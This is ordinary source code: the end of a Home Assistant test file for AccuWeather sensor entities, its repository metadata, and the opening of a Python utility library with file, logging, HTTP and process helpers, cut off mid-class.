assert state.attributes.get(ATTR_ICON) == "mdi:blur"
entry = registry.async_get("sensor.home_mold_pollen_0d")
assert entry
assert entry.unique_id == "0123456-mold-0"
state = hass.states.get("sensor.home_ozone_0d")
assert state
assert state.state == "32"
assert state.attributes.get(ATTR_ATTRIBUTION) == ATTRIBUTION
assert state.attributes.get("level") == "Good"
assert state.attributes.get(ATTR_ICON) == "mdi:vector-triangle"
entry = registry.async_get("sensor.home_ozone_0d")
assert entry
assert entry.unique_id == "0123456-ozone-0"
state = hass.states.get("sensor.home_ragweed_pollen_0d")
assert state
assert state.state == "0"
assert state.attributes.get(ATTR_ATTRIBUTION) == ATTRIBUTION
assert (
state.attributes.get(ATTR_UNIT_OF_MEASUREMENT)
== CONCENTRATION_PARTS_PER_CUBIC_METER
)
assert state.attributes.get("level") == "Low"
assert state.attributes.get(ATTR_ICON) == "mdi:sprout"
entry = registry.async_get("sensor.home_ragweed_pollen_0d")
assert entry
assert entry.unique_id == "0123456-ragweed-0"
state = hass.states.get("sensor.home_realfeel_temperature_shade_max_0d")
assert state
assert state.state == "28.0"
assert state.attributes.get(ATTR_ATTRIBUTION) == ATTRIBUTION
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == TEMP_CELSIUS
assert state.attributes.get(ATTR_DEVICE_CLASS) == DEVICE_CLASS_TEMPERATURE
entry = registry.async_get("sensor.home_realfeel_temperature_shade_max_0d")
assert entry
assert entry.unique_id == "0123456-realfeeltemperatureshademax-0"
state = hass.states.get("sensor.home_realfeel_temperature_shade_min_0d")
assert state
assert state.state == "15.1"
assert state.attributes.get(ATTR_ATTRIBUTION) == ATTRIBUTION
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == TEMP_CELSIUS
assert state.attributes.get(ATTR_DEVICE_CLASS) == DEVICE_CLASS_TEMPERATURE
entry = registry.async_get("sensor.home_realfeel_temperature_shade_min_0d")
assert entry
assert entry.unique_id == "0123456-realfeeltemperatureshademin-0"
state = hass.states.get("sensor.home_tree_pollen_0d")
assert state
assert state.state == "0"
assert state.attributes.get(ATTR_ATTRIBUTION) == ATTRIBUTION
assert (
state.attributes.get(ATTR_UNIT_OF_MEASUREMENT)
== CONCENTRATION_PARTS_PER_CUBIC_METER
)
assert state.attributes.get("level") == "Low"
assert state.attributes.get(ATTR_ICON) == "mdi:tree-outline"
entry = registry.async_get("sensor.home_tree_pollen_0d")
assert entry
assert entry.unique_id == "0123456-tree-0"
state = hass.states.get("sensor.home_wind_gust_day_0d")
assert state
assert state.state == "29.6"
assert state.attributes.get(ATTR_ATTRIBUTION) == ATTRIBUTION
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == SPEED_KILOMETERS_PER_HOUR
assert state.attributes.get("direction") == "S"
assert state.attributes.get(ATTR_ICON) == "mdi:weather-windy"
entry = registry.async_get("sensor.home_wind_gust_day_0d")
assert entry
assert entry.unique_id == "0123456-windgustday-0"
state = hass.states.get("sensor.home_wind_gust_night_0d")
assert state
assert state.state == "18.5"
assert state.attributes.get(ATTR_ATTRIBUTION) == ATTRIBUTION
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == SPEED_KILOMETERS_PER_HOUR
assert state.attributes.get("direction") == "WSW"
assert state.attributes.get(ATTR_ICON) == "mdi:weather-windy"
entry = registry.async_get("sensor.home_wind_gust_night_0d")
assert entry
assert entry.unique_id == "0123456-windgustnight-0"
async def test_availability(hass):
"""Ensure that we mark the entities unavailable correctly when service is offline."""
await init_integration(hass)
state = hass.states.get("sensor.home_cloud_ceiling")
assert state
assert state.state != STATE_UNAVAILABLE
assert state.state == "3200"
future = utcnow() + timedelta(minutes=60)
with patch(
"homeassistant.components.accuweather.AccuWeather.async_get_current_conditions",
side_effect=ConnectionError(),
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
state = hass.states.get("sensor.home_cloud_ceiling")
assert state
assert state.state == STATE_UNAVAILABLE
future = utcnow() + timedelta(minutes=120)
with patch(
"homeassistant.components.accuweather.AccuWeather.async_get_current_conditions",
return_value=json.loads(
load_fixture("accuweather/current_conditions_data.json")
),
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
state = hass.states.get("sensor.home_cloud_ceiling")
assert state
assert state.state != STATE_UNAVAILABLE
assert state.state == "3200"
async def test_manual_update_entity(hass):
"""Test manual update entity via service homeasasistant/update_entity."""
await init_integration(hass, forecast=True)
await async_setup_component(hass, "homeassistant", {})
current = json.loads(load_fixture("accuweather/current_conditions_data.json"))
forecast = json.loads(load_fixture("accuweather/forecast_data.json"))
with patch(
"homeassistant.components.accuweather.AccuWeather.async_get_current_conditions",
return_value=current,
) as mock_current, patch(
"homeassistant.components.accuweather.AccuWeather.async_get_forecast",
return_value=forecast,
) as mock_forecast:
await hass.services.async_call(
"homeassistant",
"update_entity",
{ATTR_ENTITY_ID: ["sensor.home_cloud_ceiling"]},
blocking=True,
)
assert mock_current.call_count == 1
assert mock_forecast.call_count == 1
| {
"content_hash": "1f9f04c99065054fdc4bd7788a5283be",
"timestamp": "",
"source": "github",
"line_count": 598,
"max_line_length": 89,
"avg_line_length": 36.32943143812709,
"alnum_prop": 0.6876409666283084,
"repo_name": "tchellomello/home-assistant",
"id": "b94d17066c8d776b15c55fea649a0a0bd16aea4f",
"size": "21725",
"binary": false,
"copies": "1",
"ref": "refs/heads/dev",
"path": "tests/components/accuweather/test_sensor.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1488"
},
{
"name": "Python",
"bytes": "26713364"
},
{
"name": "Shell",
"bytes": "4528"
}
],
"symlink_target": ""
} |
import argparse as _argparse
import base64 as _base64
import binascii as _binascii
import code as _code
import codecs as _codecs
import collections as _collections
import fnmatch as _fnmatch
import getpass as _getpass
import inspect as _inspect
import json as _json
import os as _os
import pprint as _pprint
import pkgutil as _pkgutil
import random as _random
import re as _re
import shlex as _shlex
import shutil as _shutil
import signal as _signal
import socket as _socket
import subprocess as _subprocess
import sys as _sys
import tempfile as _tempfile
import time as _time
import traceback as _traceback
import urllib as _urllib
import uuid as _uuid
_max = max
## Exceptions
class PlanoException(Exception):
pass
class PlanoError(PlanoException):
pass
class PlanoTimeout(PlanoException):
pass
class PlanoTestSkipped(Exception):
pass
## Global variables
ENV = _os.environ
ARGS = _sys.argv
STDIN = _sys.stdin
STDOUT = _sys.stdout
STDERR = _sys.stderr
DEVNULL = _os.devnull
LINUX = _sys.platform == "linux"
WINDOWS = _sys.platform in ("win32", "cygwin")
PLANO_DEBUG = "PLANO_DEBUG" in ENV
## Archive operations
def make_archive(input_dir, output_file=None, quiet=False):
"""
group: archive_operations
"""
check_program("tar")
archive_stem = get_base_name(input_dir)
if output_file is None:
output_file = "{}.tar.gz".format(join(get_current_dir(), archive_stem))
_info(quiet, "Making archive {} from directory {}", repr(output_file), repr(input_dir))
with working_dir(get_parent_dir(input_dir)):
run("tar -czf temp.tar.gz {}".format(archive_stem))
move("temp.tar.gz", output_file)
return output_file
def extract_archive(input_file, output_dir=None, quiet=False):
check_program("tar")
if output_dir is None:
output_dir = get_current_dir()
_info(quiet, "Extracting archive {} to directory {}", repr(input_file), repr(output_dir))
input_file = get_absolute_path(input_file)
with working_dir(output_dir):
copy(input_file, "temp.tar.gz")
try:
run("tar -xf temp.tar.gz")
finally:
remove("temp.tar.gz")
return output_dir
def rename_archive(input_file, new_archive_stem, quiet=False):
_info(quiet, "Renaming archive {} with stem {}", repr(input_file), repr(new_archive_stem))
output_dir = get_absolute_path(get_parent_dir(input_file))
output_file = "{}.tar.gz".format(join(output_dir, new_archive_stem))
input_file = get_absolute_path(input_file)
with working_dir():
extract_archive(input_file)
input_name = list_dir()[0]
input_dir = move(input_name, new_archive_stem)
make_archive(input_dir, output_file=output_file)
remove(input_file)
return output_file
## Command operations
class BaseCommand(object):
def main(self, args=None):
args = self.parse_args(args)
assert args is None or isinstance(args, _argparse.Namespace), args
self.verbose = args.verbose or args.debug
self.quiet = args.quiet
self.debug_enabled = args.debug
self.init_only = args.init_only
level = "notice"
if self.verbose:
level = "info"
if self.quiet:
level = "error"
if self.debug_enabled:
level = "debug"
with logging_enabled(level=level):
try:
self.init(args)
if self.init_only:
return
self.run()
except KeyboardInterrupt:
pass
except PlanoError as e:
if self.debug_enabled:
_traceback.print_exc()
exit(1)
else:
exit(str(e))
def parse_args(self, args): # pragma: nocover
raise NotImplementedError()
def init(self, args): # pragma: nocover
pass
def run(self): # pragma: nocover
raise NotImplementedError()
class BaseArgumentParser(_argparse.ArgumentParser):
def __init__(self, **kwargs):
super(BaseArgumentParser, self).__init__(**kwargs)
self.allow_abbrev = False
self.formatter_class = _argparse.RawDescriptionHelpFormatter
self.add_argument("--verbose", action="store_true",
help="Print detailed logging to the console")
self.add_argument("--quiet", action="store_true",
help="Print no logging to the console")
self.add_argument("--debug", action="store_true",
help="Print debugging output to the console")
self.add_argument("--init-only", action="store_true",
help=_argparse.SUPPRESS)
_capitalize_help(self)
# Patch the default help text
def _capitalize_help(parser):
try:
for action in parser._actions:
if action.help and action.help is not _argparse.SUPPRESS:
action.help = capitalize(action.help)
except: # pragma: nocover
pass
## Console operations
def flush():
_sys.stdout.flush()
_sys.stderr.flush()
def eprint(*args, **kwargs):
print(*args, file=_sys.stderr, **kwargs)
def pprint(*args, **kwargs):
args = [pformat(x) for x in args]
print(*args, **kwargs)
_color_codes = {
"black": "\u001b[30",
"red": "\u001b[31",
"green": "\u001b[32",
"yellow": "\u001b[33",
"blue": "\u001b[34",
"magenta": "\u001b[35",
"cyan": "\u001b[36",
"white": "\u001b[37",
}
_color_reset = "\u001b[0m"
def _get_color_code(color, bright):
elems = [_color_codes[color]]
if bright:
elems.append(";1")
elems.append("m")
return "".join(elems)
def _is_color_enabled(file):
return hasattr(file, "isatty") and file.isatty()
class console_color(object):
def __init__(self, color=None, bright=False, file=_sys.stdout):
self.file = file
self.color_code = None
if (color, bright) != (None, False):
self.color_code = _get_color_code(color, bright)
self.enabled = self.color_code is not None and _is_color_enabled(self.file)
def __enter__(self):
if self.enabled:
print(self.color_code, file=self.file, end="", flush=True)
def __exit__(self, exc_type, exc_value, traceback):
if self.enabled:
print(_color_reset, file=self.file, end="", flush=True)
def cformat(value, color=None, bright=False, file=_sys.stdout):
if (color, bright) != (None, False) and _is_color_enabled(file):
return "".join((_get_color_code(color, bright), value, _color_reset))
else:
return value
def cprint(*args, **kwargs):
color = kwargs.pop("color", "white")
bright = kwargs.pop("bright", False)
file = kwargs.get("file", _sys.stdout)
with console_color(color, bright=bright, file=file):
print(*args, **kwargs)
class output_redirected(object):
def __init__(self, output, quiet=False):
self.output = output
self.quiet = quiet
def __enter__(self):
flush()
_info(self.quiet, "Redirecting output to file {}", repr(self.output))
if is_string(self.output):
output = open(self.output, "w")
self.prev_stdout, self.prev_stderr = _sys.stdout, _sys.stderr
_sys.stdout, _sys.stderr = output, output
def __exit__(self, exc_type, exc_value, traceback):
flush()
_sys.stdout, _sys.stderr = self.prev_stdout, self.prev_stderr
try:
breakpoint
except NameError: # pragma: nocover
def breakpoint():
import pdb
pdb.set_trace()
def repl(vars): # pragma: nocover
_code.InteractiveConsole(locals=vars).interact()
def print_properties(props, file=None):
size = max([len(x[0]) for x in props])
for prop in props:
name = "{}:".format(prop[0])
template = "{{:<{}}} ".format(size + 1)
print(template.format(name), prop[1], end="", file=file)
for value in prop[2:]:
print(" {}".format(value), end="", file=file)
print(file=file)
## Directory operations
def find(dirs=None, include="*", exclude=()):
if dirs is None:
dirs = "."
if is_string(dirs):
dirs = (dirs,)
if is_string(include):
include = (include,)
if is_string(exclude):
exclude = (exclude,)
found = set()
for dir in dirs:
for root, dir_names, file_names in _os.walk(dir):
names = dir_names + file_names
for include_pattern in include:
names = _fnmatch.filter(names, include_pattern)
for exclude_pattern in exclude:
for name in _fnmatch.filter(names, exclude_pattern):
names.remove(name)
if root.startswith("./"):
root = remove_prefix(root, "./")
elif root == ".":
root = ""
found.update([join(root, x) for x in names])
return sorted(found)
def make_dir(dir, quiet=False):
if dir == "":
return dir
if not exists(dir):
_info(quiet, "Making directory '{}'", dir)
_os.makedirs(dir)
return dir
def make_parent_dir(path, quiet=False):
return make_dir(get_parent_dir(path), quiet=quiet)
# Returns the current working directory so you can change it back
def change_dir(dir, quiet=False):
_debug(quiet, "Changing directory to {}", repr(dir))
prev_dir = get_current_dir()
if not dir:
return prev_dir
_os.chdir(dir)
return prev_dir
def list_dir(dir=None, include="*", exclude=()):
if dir in (None, ""):
dir = get_current_dir()
assert is_dir(dir), dir
if is_string(include):
include = (include,)
if is_string(exclude):
exclude = (exclude,)
names = _os.listdir(dir)
for include_pattern in include:
names = _fnmatch.filter(names, include_pattern)
for exclude_pattern in exclude:
for name in _fnmatch.filter(names, exclude_pattern):
names.remove(name)
return sorted(names)
# No args constructor gets a temp dir
class working_dir(object):
def __init__(self, dir=None, quiet=False):
self.dir = dir
self.prev_dir = None
self.remove = False
self.quiet = quiet
if self.dir is None:
self.dir = make_temp_dir()
self.remove = True
def __enter__(self):
if self.dir == ".":
return
_info(self.quiet, "Entering directory {}", repr(get_absolute_path(self.dir)))
make_dir(self.dir, quiet=True)
self.prev_dir = change_dir(self.dir, quiet=True)
return self.dir
def __exit__(self, exc_type, exc_value, traceback):
if self.dir == ".":
return
_debug(self.quiet, "Returning to directory {}", repr(get_absolute_path(self.prev_dir)))
change_dir(self.prev_dir, quiet=True)
if self.remove:
remove(self.dir, quiet=True)
## Environment operations
def join_path_var(*paths):
return _os.pathsep.join(unique(skip(paths)))
def get_current_dir():
return _os.getcwd()
def get_home_dir(user=None):
return _os.path.expanduser("~{}".format(user or ""))
def get_user():
return _getpass.getuser()
def get_hostname():
return _socket.gethostname()
def get_program_name(command=None):
if command is None:
args = ARGS
else:
args = command.split()
for arg in args:
if "=" not in arg:
return get_base_name(arg)
def which(program_name):
return _shutil.which(program_name)
def check_env(var, message=None):
if var not in _os.environ:
if message is None:
message = "Environment variable {} is not set".format(repr(var))
raise PlanoError(message)
def check_module(module, message=None):
if _pkgutil.find_loader(module) is None:
if message is None:
message = "Module {} is not found".format(repr(module))
raise PlanoError(message)
def check_program(program, message=None):
if which(program) is None:
if message is None:
message = "Program {} is not found".format(repr(program))
raise PlanoError(message)
class working_env(object):
def __init__(self, **vars):
self.amend = vars.pop("amend", True)
self.vars = vars
def __enter__(self):
self.prev_vars = dict(_os.environ)
if not self.amend:
for name, value in list(_os.environ.items()):
if name not in self.vars:
del _os.environ[name]
for name, value in self.vars.items():
_os.environ[name] = str(value)
def __exit__(self, exc_type, exc_value, traceback):
for name, value in self.prev_vars.items():
_os.environ[name] = value
for name, value in self.vars.items():
if name not in self.prev_vars:
del _os.environ[name]
class working_module_path(object):
def __init__(self, path, amend=True):
if is_string(path):
if not is_absolute(path):
path = get_absolute_path(path)
path = [path]
if amend:
path = path + _sys.path
self.path = path
def __enter__(self):
self.prev_path = _sys.path
_sys.path = self.path
def __exit__(self, exc_type, exc_value, traceback):
_sys.path = self.prev_path
def print_env(file=None):
props = (
("ARGS", ARGS),
("ENV['PATH']", ENV.get("PATH")),
("ENV['PYTHONPATH']", ENV.get("PYTHONPATH")),
("sys.executable", _sys.executable),
("sys.path", _sys.path),
("sys.version", _sys.version.replace("\n", "")),
("get_current_dir()", get_current_dir()),
("get_home_dir()", get_home_dir()),
("get_hostname()", get_hostname()),
("get_program_name()", get_program_name()),
("get_user()", get_user()),
("plano.__file__", __file__),
("which('plano')", which("plano")),
)
print_properties(props, file=file)
## File operations
def touch(file, quiet=False):
_info(quiet, "Touching {}", repr(file))
try:
_os.utime(file, None)
except OSError:
append(file, "")
return file
# symlinks=True - Preserve symlinks
# inside=True - Place from_path inside to_path if to_path is a directory
def copy(from_path, to_path, symlinks=True, inside=True, quiet=False):
_info(quiet, "Copying {} to {}", repr(from_path), repr(to_path))
if is_dir(to_path) and inside:
to_path = join(to_path, get_base_name(from_path))
else:
make_parent_dir(to_path, quiet=True)
if is_dir(from_path):
for name in list_dir(from_path):
copy(join(from_path, name), join(to_path, name), symlinks=symlinks, inside=False, quiet=True)
_shutil.copystat(from_path, to_path)
elif is_link(from_path) and symlinks:
make_link(to_path, read_link(from_path), quiet=True)
else:
_shutil.copy2(from_path, to_path)
return to_path
# inside=True - Place from_path inside to_path if to_path is a directory
def move(from_path, to_path, inside=True, quiet=False):
_info(quiet, "Moving {} to {}", repr(from_path), repr(to_path))
to_path = copy(from_path, to_path, inside=inside, quiet=True)
remove(from_path, quiet=True)
return to_path
def remove(paths, quiet=False):
if is_string(paths):
paths = (paths,)
for path in paths:
if not exists(path):
continue
_debug(quiet, "Removing {}", repr(path))
if is_dir(path):
_shutil.rmtree(path, ignore_errors=True)
else:
_os.remove(path)
def get_file_size(file):
return _os.path.getsize(file)
## IO operations
def read(file):
with _codecs.open(file, encoding="utf-8", mode="r") as f:
return f.read()
def write(file, string):
make_parent_dir(file, quiet=True)
with _codecs.open(file, encoding="utf-8", mode="w") as f:
f.write(string)
return file
def append(file, string):
make_parent_dir(file, quiet=True)
with _codecs.open(file, encoding="utf-8", mode="a") as f:
f.write(string)
return file
def prepend(file, string):
orig = read(file)
return write(file, string + orig)
def tail(file, count):
return "".join(tail_lines(file, count))
def read_lines(file):
with _codecs.open(file, encoding="utf-8", mode="r") as f:
return f.readlines()
def write_lines(file, lines):
make_parent_dir(file, quiet=True)
with _codecs.open(file, encoding="utf-8", mode="w") as f:
f.writelines(lines)
return file
def append_lines(file, lines):
make_parent_dir(file, quiet=True)
with _codecs.open(file, encoding="utf-8", mode="a") as f:
f.writelines(lines)
return file
def prepend_lines(file, lines):
orig_lines = read_lines(file)
make_parent_dir(file, quiet=True)
with _codecs.open(file, encoding="utf-8", mode="w") as f:
f.writelines(lines)
f.writelines(orig_lines)
return file
def tail_lines(file, count):
assert count >= 0
with _codecs.open(file, encoding="utf-8", mode="r") as f:
pos = count + 1
lines = list()
while len(lines) <= count:
try:
f.seek(-pos, 2)
except IOError:
f.seek(0)
break
finally:
lines = f.readlines()
pos *= 2
return lines[-count:]
def replace_in_file(file, expr, replacement, count=0):
write(file, replace(read(file), expr, replacement, count=count))
def concatenate(file, input_files):
assert file not in input_files
make_parent_dir(file, quiet=True)
with open(file, "wb") as f:
for input_file in input_files:
if not exists(input_file):
continue
with open(input_file, "rb") as inf:
_shutil.copyfileobj(inf, f)
## Iterable operations
def unique(iterable):
return list(_collections.OrderedDict.fromkeys(iterable).keys())
def skip(iterable, values=(None, "", (), [], {})):
if is_scalar(values):
values = (values,)
items = list()
for item in iterable:
if item not in values:
items.append(item)
return items
## JSON operations
def read_json(file):
with _codecs.open(file, encoding="utf-8", mode="r") as f:
return _json.load(f)
def write_json(file, data):
make_parent_dir(file, quiet=True)
with _codecs.open(file, encoding="utf-8", mode="w") as f:
_json.dump(data, f, indent=4, separators=(",", ": "), sort_keys=True)
return file
def parse_json(json):
return _json.loads(json)
def emit_json(data):
return _json.dumps(data, indent=4, separators=(",", ": "), sort_keys=True)
## HTTP operations
def _run_curl(method, url, content=None, content_file=None, content_type=None, output_file=None, insecure=False):
check_program("curl")
options = [
"-sf",
"-X", method,
"-H", "'Expect:'",
]
if content is not None:
assert content_file is None
options.extend(("-d", "@-"))
if content_file is not None:
assert content is None, content
options.extend(("-d", "@{}".format(content_file)))
if content_type is not None:
options.extend(("-H", "'Content-Type: {}'".format(content_type)))
if output_file is not None:
options.extend(("-o", output_file))
if insecure:
options.append("--insecure")
options = " ".join(options)
command = "curl {} {}".format(options, url)
if output_file is None:
return call(command, input=content)
else:
make_parent_dir(output_file, quiet=True)
run(command, input=content)
def http_get(url, output_file=None, insecure=False):
return _run_curl("GET", url, output_file=output_file, insecure=insecure)
def http_get_json(url, insecure=False):
return parse_json(http_get(url, insecure=insecure))
def http_put(url, content, content_type=None, insecure=False):
_run_curl("PUT", url, content=content, content_type=content_type, insecure=insecure)
def http_put_file(url, content_file, content_type=None, insecure=False):
_run_curl("PUT", url, content_file=content_file, content_type=content_type, insecure=insecure)
def http_put_json(url, data, insecure=False):
http_put(url, emit_json(data), content_type="application/json", insecure=insecure)
def http_post(url, content, content_type=None, output_file=None, insecure=False):
return _run_curl("POST", url, content=content, content_type=content_type, output_file=output_file, insecure=insecure)
def http_post_file(url, content_file, content_type=None, output_file=None, insecure=False):
return _run_curl("POST", url, content_file=content_file, content_type=content_type, output_file=output_file, insecure=insecure)
def http_post_json(url, data, insecure=False):
return parse_json(http_post(url, emit_json(data), content_type="application/json", insecure=insecure))
## Link operations
def make_link(path, linked_path, quiet=False):
_info(quiet, "Making link {} to {}", repr(path), repr(linked_path))
make_parent_dir(path, quiet=True)
remove(path, quiet=True)
_os.symlink(linked_path, path)
return path
def read_link(path):
return _os.readlink(path)
## Logging operations
_logging_levels = (
"debug",
"info",
"notice",
"warn",
"error",
"disabled",
)
_DEBUG = _logging_levels.index("debug")
_INFO = _logging_levels.index("info")
_NOTICE = _logging_levels.index("notice")
_WARN = _logging_levels.index("warn")
_ERROR = _logging_levels.index("error")
_DISABLED = _logging_levels.index("disabled")
_logging_output = None
_logging_threshold = _NOTICE
def enable_logging(level="notice", output=None):
assert level in _logging_levels
info("Enabling logging (level={}, output={})", repr(level), repr(nvl(output, "stderr")))
global _logging_threshold
_logging_threshold = _logging_levels.index(level)
if is_string(output):
output = open(output, "w")
global _logging_output
_logging_output = output
def disable_logging():
info("Disabling logging")
global _logging_threshold
_logging_threshold = _DISABLED
class logging_enabled(object):
def __init__(self, level="notice", output=None):
self.level = level
self.output = output
def __enter__(self):
self.prev_level = _logging_levels[_logging_threshold]
self.prev_output = _logging_output
if self.level == "disabled":
disable_logging()
else:
enable_logging(level=self.level, output=self.output)
def __exit__(self, exc_type, exc_value, traceback):
if self.prev_level == "disabled":
disable_logging()
else:
enable_logging(level=self.prev_level, output=self.prev_output)
class logging_disabled(logging_enabled):
def __init__(self):
super(logging_disabled, self).__init__(level="disabled")
def fail(message, *args):
error(message, *args)
if isinstance(message, BaseException):
raise message
raise PlanoError(message.format(*args))
def error(message, *args):
log(_ERROR, message, *args)
def warn(message, *args):
log(_WARN, message, *args)
def notice(message, *args):
log(_NOTICE, message, *args)
def info(message, *args):
log(_INFO, message, *args)
def debug(message, *args):
log(_DEBUG, message, *args)
def log(level, message, *args):
if is_string(level):
level = _logging_levels.index(level)
if _logging_threshold <= level:
_print_message(level, message, args)
def _print_message(level, message, args):
out = nvl(_logging_output, _sys.stderr)
exception = None
if isinstance(message, BaseException):
exception = message
message = "{}: {}".format(type(message).__name__, str(message))
else:
message = str(message)
if args:
message = message.format(*args)
program = "{}:".format(get_program_name())
level_color = ("cyan", "cyan", "blue", "yellow", "red", None)[level]
level_bright = (False, False, False, False, True, False)[level]
level = cformat("{:>6}:".format(_logging_levels[level]), color=level_color, bright=level_bright, file=out)
print(program, level, capitalize(message), file=out)
if exception is not None and hasattr(exception, "__traceback__"):
_traceback.print_exception(type(exception), exception, exception.__traceback__, file=out)
out.flush()
def _debug(quiet, message, *args):
if quiet:
debug(message, *args)
else:
notice(message, *args)
def _info(quiet, message, *args):
if quiet:
info(message, *args)
else:
notice(message, *args)
## Path operations
def get_absolute_path(path):
return _os.path.abspath(path)
def normalize_path(path):
return _os.path.normpath(path)
def get_real_path(path):
return _os.path.realpath(path)
def get_relative_path(path, start=None):
return _os.path.relpath(path, start=start)
def get_file_url(path):
return "file:{}".format(get_absolute_path(path))
def exists(path):
return _os.path.lexists(path)
def is_absolute(path):
return _os.path.isabs(path)
def is_dir(path):
return _os.path.isdir(path)
def is_file(path):
return _os.path.isfile(path)
def is_link(path):
return _os.path.islink(path)
def join(*paths):
path = _os.path.join(*paths)
path = normalize_path(path)
return path
def split(path):
path = normalize_path(path)
parent, child = _os.path.split(path)
return parent, child
def split_extension(path):
path = normalize_path(path)
root, ext = _os.path.splitext(path)
return root, ext
def get_parent_dir(path):
path = normalize_path(path)
parent, child = split(path)
return parent
def get_base_name(path):
path = normalize_path(path)
parent, name = split(path)
return name
def get_name_stem(file):
name = get_base_name(file)
if name.endswith(".tar.gz"):
name = name[:-3]
stem, ext = split_extension(name)
return stem
def get_name_extension(file):
name = get_base_name(file)
stem, ext = split_extension(name)
return ext
def _check_path(path, test_func, message):
if not test_func(path):
parent_dir = get_parent_dir(path)
if is_dir(parent_dir):
found_paths = ", ".join([repr(x) for x in list_dir(parent_dir)])
message = "{}. The parent directory contains: {}".format(message.format(repr(path)), found_paths)
else:
message = "{}".format(message.format(repr(path)))
raise PlanoError(message)
def check_exists(path):
_check_path(path, exists, "File or directory {} not found")
def check_file(path):
_check_path(path, is_file, "File {} not found")
def check_dir(path):
_check_path(path, is_dir, "Directory {} not found")
def await_exists(path, timeout=30, quiet=False):
_info(quiet, "Waiting for path {} to exist", repr(path))
timeout_message = "Timed out waiting for path {} to exist".format(path)
period = 0.03125
with Timer(timeout=timeout, timeout_message=timeout_message) as timer:
while True:
try:
check_exists(path)
except PlanoError:
sleep(period, quiet=True)
period = min(1, period * 2)
else:
return
## Port operations
def get_random_port(min=49152, max=65535):
ports = [_random.randint(min, max) for _ in range(3)]
for port in ports:
try:
check_port(port)
except PlanoError:
return port
raise PlanoError("Random ports unavailable")
def check_port(port, host="localhost"):
sock = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
sock.setsockopt(_socket.SOL_SOCKET, _socket.SO_REUSEADDR, 1)
if sock.connect_ex((host, port)) != 0:
raise PlanoError("Port {} (host {}) is not reachable".format(repr(port), repr(host)))
def await_port(port, host="localhost", timeout=30, quiet=False):
_info(quiet, "Waiting for port {}", port)
if is_string(port):
port = int(port)
timeout_message = "Timed out waiting for port {} to open".format(port)
period = 0.03125
with Timer(timeout=timeout, timeout_message=timeout_message) as timer:
while True:
try:
check_port(port, host=host)
except PlanoError:
sleep(period, quiet=True)
period = min(1, period * 2)
else:
return
## Process operations
def get_process_id():
return _os.getpid()
def _format_command(command, represent=True):
if not is_string(command):
command = " ".join(command)
if represent:
return repr(command)
else:
return command
# quiet=False - Don't log at notice level
# stash=False - No output unless there is an error
# output=<file> - Send stdout and stderr to a file
# stdin=<file> - XXX
# stdout=<file> - Send stdout to a file
# stderr=<file> - Send stderr to a file
# shell=False - XXX
def start(command, stdin=None, stdout=None, stderr=None, output=None, shell=False, stash=False, quiet=False):
_info(quiet, "Starting command {}", _format_command(command))
if output is not None:
stdout, stderr = output, output
if is_string(stdin):
stdin = open(stdin, "r")
if is_string(stdout):
stdout = open(stdout, "w")
if is_string(stderr):
stderr = open(stderr, "w")
if stdin is None:
stdin = _sys.stdin
if stdout is None:
stdout = _sys.stdout
if stderr is None:
stderr = _sys.stderr
stash_file = None
if stash:
stash_file = make_temp_file()
out = open(stash_file, "w")
stdout = out
stderr = out
if shell:
if is_string(command):
args = command
else:
args = " ".join(command)
else:
if is_string(command):
args = _shlex.split(command)
else:
args = command
try:
proc = PlanoProcess(args, stdin=stdin, stdout=stdout, stderr=stderr, shell=shell, close_fds=True, stash_file=stash_file)
except OSError as e:
raise PlanoError("Command {}: {}".format(_format_command(command), str(e)))
debug("{} started", proc)
return proc
def stop(proc, timeout=None, quiet=False):
_info(quiet, "Stopping {}", proc)
if proc.poll() is not None:
if proc.exit_code == 0:
debug("{} already exited normally", proc)
elif proc.exit_code == -(_signal.SIGTERM):
debug("{} was already terminated", proc)
else:
debug("{} already exited with code {}", proc, proc.exit_code)
return proc
kill(proc, quiet=True)
return wait(proc, timeout=timeout, quiet=True)
def kill(proc, quiet=False):
_info(quiet, "Killing {}", proc)
proc.terminate()
def wait(proc, timeout=None, check=False, quiet=False):
_info(quiet, "Waiting for {} to exit", proc)
try:
proc.wait(timeout=timeout)
except _subprocess.TimeoutExpired:
raise PlanoTimeout()
if proc.exit_code == 0:
debug("{} exited normally", proc)
elif proc.exit_code < 0:
debug("{} was terminated by signal {}", proc, abs(proc.exit_code))
else:
debug("{} exited with code {}", proc, proc.exit_code)
if proc.stash_file is not None:
if proc.exit_code > 0:
eprint(read(proc.stash_file), end="")
if not WINDOWS:
remove(proc.stash_file, quiet=True)
if check and proc.exit_code > 0:
raise PlanoProcessError(proc)
return proc
# input=<string> - Pipe <string> to the process
def run(command, stdin=None, stdout=None, stderr=None, input=None, output=None,
stash=False, shell=False, check=True, quiet=False):
_info(quiet, "Running command {}", _format_command(command))
if input is not None:
assert stdin in (None, _subprocess.PIPE), stdin
input = input.encode("utf-8")
stdin = _subprocess.PIPE
proc = start(command, stdin=stdin, stdout=stdout, stderr=stderr, output=output,
stash=stash, shell=shell, quiet=True)
proc.stdout_result, proc.stderr_result = proc.communicate(input=input)
if proc.stdout_result is not None:
proc.stdout_result = proc.stdout_result.decode("utf-8")
if proc.stderr_result is not None:
proc.stderr_result = proc.stderr_result.decode("utf-8")
return wait(proc, check=check, quiet=True)
# input=<string> - Pipe the given input into the process
def call(command, input=None, shell=False, quiet=False):
_info(quiet, "Calling {}", _format_command(command))
proc = run(command, stdin=_subprocess.PIPE, stdout=_subprocess.PIPE, stderr=_subprocess.PIPE,
input=input, shell=shell, check=True, quiet=True)
return proc.stdout_result
def exit(arg=None, *args, **kwargs):
verbose = kwargs.get("verbose", False)
if arg in (0, None):
if verbose:
notice("Exiting normally")
_sys.exit()
if is_string(arg):
if args:
arg = arg.format(*args)
if verbose:
error(arg)
_sys.exit(arg)
if isinstance(arg, BaseException):
if verbose:
error(arg)
_sys.exit(str(arg))
if isinstance(arg, int):
_sys.exit(arg)
raise PlanoException("Illegal argument")
_child_processes = list()
class PlanoProcess(_subprocess.Popen):
def __init__(self, args, **options):
self.stash_file = options.pop("stash_file", None)
super(PlanoProcess, self).__init__(args, **options)
self.args = args
self.stdout_result = None
